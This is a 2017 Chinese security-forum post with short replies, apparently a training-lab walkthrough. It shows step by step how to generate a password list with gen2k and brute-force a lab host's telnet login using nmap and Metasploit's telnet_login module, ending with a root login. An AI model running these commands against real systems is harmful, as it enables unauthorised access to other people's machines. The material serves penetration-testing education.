首页
社区
课程
招聘
[分享]Metasploit批量验证爆破telnet
发表于: 2017-11-17 17:25 5919

[分享]Metasploit批量验证爆破telnet

2017-11-17 17:25
5919
Metasploit批量验证爆破telnet

    实验原理:
        
        1) 利用gen2k工具,根据收集来的信息,自动生成密码,使用枚举的方法破解telnet登陆密码。
        
    实验步骤:    
        
        一、利用gen2k工具生成密码表
        
            1.1 使用gen2k工具生成密码表。单击桌面空白处,右键菜单选择“在终端中打开”
            1.2 在终端中输入命令“cd /home”,进入软件目录,在终端中输入命令“more user.txt”,查看已收集到的关键词文件“user.txt”,利用此文件生成对应的密码
            1.3 在终端中输入命令“python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt”,生成密码文件passwd.txt,在终端下输入命令“more passwd.txt”,查看生成的内容
        
        二、利用Metasploit暴破目标主机telnet服务
        
            2.1 在终端中输入命令“nmap –sV 192.168.1.3”,扫描目标主机,发现目标主机开启telnet服务
            2.2 在终端中输入命令“msfconsole”,启动MSF终端
            2.3 在终端中输入命令“search telnet”,搜索telnet的相关工具和攻击载荷
            2.4 在终端中输入命令“use auxiliary/scanner/telnet/telnet_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下
            2.5 在终端中输入命令“set RHOSTS 192.168.1.3”,设置目标主机的IP地址。
            2.6 在终端中输入命令“set PASS_FILE /home/passwd.txt”,爆破时使用的密码文件为passwd.txt。
            2.7 在终端中输入命令“set USER_FILE /home/user.txt”,爆破时使用的用户名文件为user.txt。
            2.8 在终端中输入“exploit 192.168.1.3”, 对目标主机进行暴力破解。
            2.9 拆解到密码
            2.10 在终端中输入“telnet 192.168.1.3 ”,输入获取的账号root和密码Simplexue123,连接成功。

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 300
活跃值: (2532)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
mark
2017-11-17 17:30
0
雪    币: 23
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
2017-12-19 09:11
0
雪    币: 1
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
hacker
2017-12-29 16:36
0
雪    币: 231
活跃值: (13)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
mark
2017-12-30 21:43
0
游客
登录 | 注册 方可回帖
返回
//